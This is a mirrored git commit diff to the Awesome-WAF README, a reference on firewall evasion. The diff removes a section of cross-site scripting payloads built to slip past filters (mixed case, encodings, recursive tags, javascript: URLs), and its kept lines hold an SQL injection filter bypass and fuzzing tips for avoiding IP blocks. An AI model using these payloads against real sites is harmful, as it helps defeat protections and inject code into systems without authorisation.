mirror of
https://github.com/0xInfection/Awesome-WAF.git
synced 2024-10-01 04:35:35 -04:00
Some changes
This commit is contained in:
parent
5aa44db632
commit
6eae91aff8
58
README.md
58
README.md
@ -1417,11 +1417,9 @@ Wanna detect WAFs? Lets see how.
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
# Evasion Techniques
|
||||
## Evasion Techniques
|
||||
Lets look at some methods of bypassing and evading WAFs.
|
||||
|
||||
## Cross Site Scripting:
|
||||
|
||||
### Fuzzing/Bruteforcing:
|
||||
#### Method:
|
||||
Running a set of payloads against the URL/endpoint. Some nice fuzzing wordlists:
|
||||
@ -1430,11 +1428,10 @@ Running a set of payloads against the URL/endpoint. Some nice fuzzing wordlists:
|
||||
- [Fuzz-DB/Attack](https://github.com/fuzzdb-project/fuzzdb/tree/master/attack)
|
||||
|
||||
#### Technique:
|
||||
|
||||
- Load up your wordlist into Burp Suite Intruder/custom fuzzer and start the bruteforce.
|
||||
- Load up your wordlist into fuzzer and start the bruteforce.
|
||||
- Record/log all responses from the different payloads fuzzed.
|
||||
- Use random user-agents, ranging from Chrome Desktop to iPhone browser.
|
||||
- If blocking noticed, increase fuzz latency (eg. 2-4 secs)
|
||||
- If blocking noticed, increase fuzz latency (eg. 2-4 secs).
|
||||
- Always use proxies, since chances are real that your IP gets blocked.
|
||||
|
||||
#### Drawbacks:
|
||||
@ -1510,55 +1507,6 @@ __Possible PHP Filter Code__: `preg_match('/(and|or|union|where|limit|group b
|
||||
- __Filtered Injection__: `1 || lpad(user,7,1)`
|
||||
- __Bypassed Injection__: `1%0b||%0blpad(user,7,1)`
|
||||
|
||||
---
|
||||
|
||||
__Scenario 2: Cross Site Scripting__
|
||||
|
||||
- Normal deliberate test:
|
||||
```
|
||||
<script>alert()</script>
|
||||
```
|
||||
- Checking if the firewall is blocking only lowercase:
|
||||
```
|
||||
<sCRipT>alert(1)</sCRiPt>
|
||||
```
|
||||
- Bypassing firewall regex with new line (`\r\n`):
|
||||
```
|
||||
<script>\r\nalert(1)</script>
|
||||
|
||||
<script>
|
||||
alert(1)</script>
|
||||
```
|
||||
- Bypass trial with hex notation:
|
||||
```
|
||||
%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3B%3C%2F%73%63%72%69%70%74%3E
|
||||
```
|
||||
- Bypass trials with ECMAScript6 variation:
|
||||
```
|
||||
<svg><script>alert`1`</p>
|
||||
<svg><script>alert`1`
|
||||
```
|
||||
- Testing for recursive filters:
|
||||
```
|
||||
<scr<script>ipt>alert(1);</scr</script>ipt>
|
||||
```
|
||||
- Bypass trials with anchor tags without whitespaces:
|
||||
```
|
||||
<a/href=”j	a	v	asc	ri	pt:alert(1)”>
|
||||
```
|
||||
- Bypass trial with HTML encoded notation:
|
||||
```
|
||||
<script>alert(1);</script>
|
||||
```
|
||||
- Bypass trial with unicode encoding:
|
||||
```
|
||||
script/src="data:text%2Fj\u0061v\u0061script,\u0061lert(1)"></script a=\u0061 & /=%2F
|
||||
```
|
||||
- Bypass trial via overflow technique:
|
||||
```
|
||||
<iframe src=j
	a
		v
			a
				s
					c
						r
							i
		 						p
									t
										:a
											l
					 							e
													r
														t
										 					%28
																1
																	%29></iframe>
|
||||
```
|
||||
|
||||
### Obfuscation:
|
||||
#### Method:
|
||||
- Encoding payload to different encodings (a hit and trial approach).
|
||||
|
Loading…
Reference in New Issue
Block a user